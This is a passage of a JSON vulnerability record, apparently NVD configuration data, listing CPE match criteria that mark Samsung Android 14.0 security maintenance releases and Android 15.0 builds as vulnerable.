"matchCriteriaId": "12C17130-A0C0-49E1-8525-9D65F0275270"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-feb-2025-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "E010EDC6-D78E-4126-92B0-2F6A10DE76AC"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jan-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "4FAA7790-A323-4ECA-834E-F19E59C571F5"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jan-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "9CE09EF7-B024-4D79-9400-C8223CDFBB86"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jan-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "C339A665-413D-443F-AD04-F71C161235D0"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jan-2025-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "EB47786E-68AB-4FF1-B9D9-925D65702E4B"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jul-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "213AC4D5-3B95-4120-B72D-A9327BADE2BC"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jul-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "3DD61EDA-98ED-4309-B54F-0CF8B7D07DC7"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jul-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "F7DCB465-A0F7-496E-BE45-0B5FA1508D93"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jun-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "6D65C03E-7BC3-491A-8621-A8C93FBA0A69"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jun-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "4ECB0B7A-590C-460C-878B-9A78CB37D259"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-jun-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "D66CF415-6C4A-4AF3-B660-B2E9CF484B51"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-mar-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "31B5B670-ACDE-4A64-97C5-358D79C65080"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-mar-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "EAFE015F-8130-4F10-A553-420F0BB2A132"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-mar-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "141E541B-8FA5-4829-A413-4F1DC19E9AE1"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-mar-2025-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "FFCA253F-EE13-4C52-8CB7-D72C117576D0"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-may-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "77CE3494-F7C0-497B-8491-107D31C9A91F"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-may-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "ACEA385E-3931-4438-A2A9-0357651F9B48"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-may-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "A57CB118-46CC-4CE8-ACC3-A806CD2C25A9"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-nov-2021-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "84F3023F-E65C-4871-A65A-738EFF64D365"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-nov-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "6DD1F78D-EA98-4825-A0EA-703196DDE5E4"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-nov-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "BDDB3FBE-99EC-4763-961B-2C436D864A1A"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-nov-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "B5746517-D8FF-4819-9B98-D06B475C6CDF"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-oct-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "1B02110E-71FB-495F-86CA-F2A4E55C0E42"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-oct-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "931CC6D7-A42D-4482-B901-B539DFF89C3E"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-oct-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "F7EB9C6E-CF84-4E4D-94D8-39233F8EC4DD"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-sep-2022-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "852A1BEC-438F-4D1E-B361-87BD57D50157"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-sep-2023-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "84ED2366-D4BA-4094-94AC-AD6E7AEBB6FF"
},
{
"criteria": "cpe:2.3:o:samsung:android:14.0:smr-sep-2024-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "ABFE99DC-4495-4D4F-80D4-C29A1D22A9C5"
},
{
"criteria": "cpe:2.3:o:samsung:android:15.0:-:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "95DE4E96-2F23-47E5-9DFC-44EC409F37E8"
},
{
"criteria": "cpe:2.3:o:samsung:android:15.0:smr-mar-2025-r1:*:*:*:*:*:*",
"vulnerable": true,
"matchCriteriaId": "FC6E2318-BD4E-4540-82C3-0D461C691119"
}
],
"operator": "OR"
}
]
}
]